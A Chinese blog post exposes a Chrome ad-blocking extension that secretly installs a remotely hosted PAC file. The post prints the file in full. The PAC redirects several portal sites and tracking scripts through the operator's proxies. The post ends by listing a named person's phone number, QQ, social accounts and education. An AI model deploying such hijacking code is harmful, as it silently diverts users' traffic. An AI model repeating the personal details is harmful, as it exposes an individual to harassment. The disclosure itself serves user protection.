插件地址
https://chrome.google.com/webstore/detail/%E5%B0%8F%E9%BB%84%E7%93%9C%E8%A7%86%E9%A2%91%E5%B9%BF%E5%91%8A%E6%8B%A6%E6%88%AA/goppkfbpdcohaknmoabhnfclcepcjlda?utm_source=chrome-app-launcher-info-dialog 因为之前使用的去视频去广告插件坑爹了!年久失修,于是去chrome商店看看有没有其他的合适的。
找到《小黄瓜视频广告拦截》,试用了下,可以去广告,但是……
我的代理切换插件不能用了 0 0……代理操作被它独占了,禁用《小黄瓜视频广告拦截》后发现SwitchyOmega颜色不太对(平时绿色,这时变成蓝色了),鼠标放上去显示……现在是一个pac文件在控制代理。
这个pac文件的地址是
http://www.123zouni.com/proxy.pac 好奇宝宝下一步的操作大家都猜到了吧,那就是打开这个网址看看!结果…… 内容如下。
function FindProxyForURL(url, host) {
var regexStr = /.*?:\/\/.*?(youku|qiyi|iqiyi|letv|sohu|ku6|ku6cdn|pps)\.(com|tv)\/crossdomain\.xml/;
if(regexStr.test(url)){
return 'PROXY yk.pp.navi.youku.com:80';
}
if(/^http\:\/\/www\.9991\.com\/\?\w+/.test(url)||/^http\:\/\/www\.9991\.com\/$/.test(url)){
return 'PROXY
www.123zouni.com:30005;DIRECT;';
}
if((/^http\:\/\/www\.duba\.com\/\?\w+/.test(url)||/^http\:\/\/www\.duba\.com\/$/.test(url))&&!/http\:\/\/www\.duba\.com\/\?un\_4\_452915/.test(url)){
return 'PROXY
www.123zouni.com:30005;DIRECT;';
}
if((/^http\:\/\/123\.sogou\.com\/\?\w+/.test(url)||/^http\:\/\/123\.sogou\.com\/$/.test(url))&&!/http\:\/\/123\.sogou\.com\/\?21705/.test(url)){
return 'PROXY
www.123zouni.com:30005;DIRECT;';
}
if((/^http\:\/\/www\.2345\.com\/\?\w+/.test(url)||/^http\:\/\/www\.2345\.com\/$/.test(url))&&!/http\:\/\/www\.2345\.com\/\?29955/.test(url)){
return 'PROXY
www.123zouni.com:30005;DIRECT;';
}
if((/^http\:\/\/hao\.360\.cn\/\?\w+/.test(url)||/^http\:\/\/hao\.360\.cn\/$/.test(url))&&!/http\:\/\/hao\.360\.cn\/\?src\=lm\&ls\=n078749b590/.test(url)){
return 'PROXY
www.123zouni.com:30005;DIRECT;';
}
if((/^http\:\/\/www\.hao123\.com\/\?\w+/.test(url)||/^http\:\/\/www\.hao123\.com\/$/.test(url))&&!/http\:\/\/www\.hao123\.com\/\?tn\=(96445394|91784390|91783592)\_hao\_pg/.test(url)){
return 'PROXY
www.123zouni.com:30005;DIRECT;';
}
var regexStr123=/.*?:\/\/.*?(hao123img)\.com\/res\/js\/track\.js.*/;
if(regexStr123.test(url)){return'PROXY 52.68.93.94:9998'}
var regexStr360=/.*?:\/\/.*?(qhimg)\.com\/lib\/qwrap\/113\.js/;
if(regexStr360.test(url)){return'PROXY 52.68.93.94:9998'}
return 'DIRECT';
}
因为我的js是体育老师教的,但是大概也猜到,就是你访问9991.com,2345.com,hao.360.cn,hao123.com 这些网站的时候 这个网址其实是访问的另外一个网址,下面似乎还对一些js文件进行了劫持……
而且为什么要写在pac文件里呢?最简单的原因,就是chrome官方进行审核的时候,是无法审查到这些奇怪的代码的,因为这些代码在自己网站上,随时可改……
而且今天劫持的是这些网址站,还有一些js文件,明天又会劫持什么呢?这就不得而知了……
顺手放狗搜了下
123zouni.com 是谁的 此人也混知乎 知乎的名字是宋超 这里也可以看到他的个人主页是
http://songchao.123zouni.com/ qq号码是 50810004 微博是
http://www.weibo.com/thinkfish1210 电话是 15001373313 博客园是
http://dachie.cnblogs.com/ http://www.cnblogs.com/dachie/ 邮箱:
[email protected] 在哪上学
2012.7-2012.8尚德培训机构PMP项目管理培训PMP证书
2005.9-2008.6湖南城市学院园林工程技术专业大专
这些个人信息都是他放在自己个人主页上的 不能算侵犯个人隐私吧?